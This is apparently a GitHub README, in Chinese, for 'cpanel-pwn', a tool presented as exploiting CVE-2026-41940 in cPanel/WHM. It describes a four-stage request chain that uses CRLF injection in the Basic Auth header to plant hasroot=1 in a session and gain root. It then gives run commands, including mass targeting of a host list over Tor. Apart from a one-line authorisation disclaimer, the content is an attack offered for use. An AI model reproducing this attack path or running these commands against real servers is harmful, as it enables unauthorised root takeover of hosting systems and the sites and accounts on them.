Richflexpix/cpanel-pwn

# cpanel-pwn cPanel/WHM 安全测试工具包。实现了 CVE-2026-41940 CRLF 注入身份验证绕过以及后渗透权限提升。 ## 工具 | 脚本 | 用途 | |--------|---------| | `cpanel_exploit.py` | CVE-2026-41940: CRLF 注入 → WHM 身份验证绕过 → root 访问权限 | ## CVE-2026-41940 **类型:** CRLF 注入 → 身份验证绕过 → Root RCE **受影响版本:** cPanel/WHM < 已修复版本 **攻击方式:** 在 Basic Auth 请求头中进行预认证 CRLF 注入，向服务器端会话文件中注入 `hasroot=1`，从而将未经身份验证的会话提升为 WHM root 权限。 ``` Stage 1: POST /login/?login_only=1 → mints pre-auth session Stage 2: GET / Authorization:Basic → injects hasroot=1, leaks cpsess token Stage 3: GET /scripts2/listaccts → fires session-cache propagation gadget Stage 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + version = ROOT ACCESS ``` ## 使用方法 ``` pip install requests python cpanel_exploit.py -t target.com python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2 python cpanel_exploit.py -t target.com --verify-only # CRLF check only, no priv-esc ``` ## 授权说明 仅供授权的渗透测试使用。

标签：0day, CISA项目, cPanel, CRLF注入, CVE-2026-41940, HTTP请求走私, PoC, Python, RCE, Root提权, Web安全, WHM, 协议分析, 安全测试, 攻击性安全, 攻击路径可视化, 数据展示, 无后门, 无服务器架构, 暴力破解, 权限提升, 红队, 编程工具, 网络安全, 蓝队分析, 身份验证绕过, 远程代码执行, 逆向工具, 隐私保护, 黑客工具